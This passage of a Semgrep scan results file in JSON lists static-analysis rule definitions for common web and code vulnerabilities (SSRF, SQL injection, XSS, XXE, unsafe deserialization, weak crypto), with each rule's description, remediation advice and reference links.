[https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","id":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","name":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"help":{"markdown":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel)\n - [https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ](https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ)\n","text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","id":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","name":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"help":{"markdown":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","id":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","name":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"help":{"markdown":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw)\n - [https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===](https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===)\n - [https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027](https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027)\n","text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","id":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","name":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell","id":"ruby.lang.security.dangerous-subshell.dangerous-subshell","name":"ruby.lang.security.dangerous-subshell.dangerous-subshell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-subshell.dangerous-subshell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","id":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","name":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"help":{"markdown":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","id":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","name":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"help":{"markdown":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection)\n - [https://laravel.com/docs/8.x/queries](https://laravel.com/docs/8.x/queries)\n","text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection","id":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","name":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-sql-injection.laravel-sql-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint","id":"rust.hyper.sql.postgres-taint.postgres-taint","name":"rust.hyper.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","id":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","name":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"help":{"markdown":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)\n","text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","id":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","name":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-direct-response-write.laravel-direct-response-write"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"help":{"markdown":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses)\n","text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","id":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","name":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"help":{"markdown":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone)\n - [https://pkg.go.dev/github.com/gorilla/sessions#Options](https://pkg.go.dev/github.com/gorilla/sessions#Options)\n","text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"helpUri":"https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","id":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","name":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.xss.xss)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/javascript.browser.xss.xss","id":"javascript.browser.xss.xss","name":"javascript.browser.xss.xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.xss.xss"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"help":{"markdown":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization)\n - [https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)\n","text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"helpUri":"https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","id":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","name":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg","id":"javascript.jose.security.jwt-none-alg.jwt-none-alg","name":"javascript.jose.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","id":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","name":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send 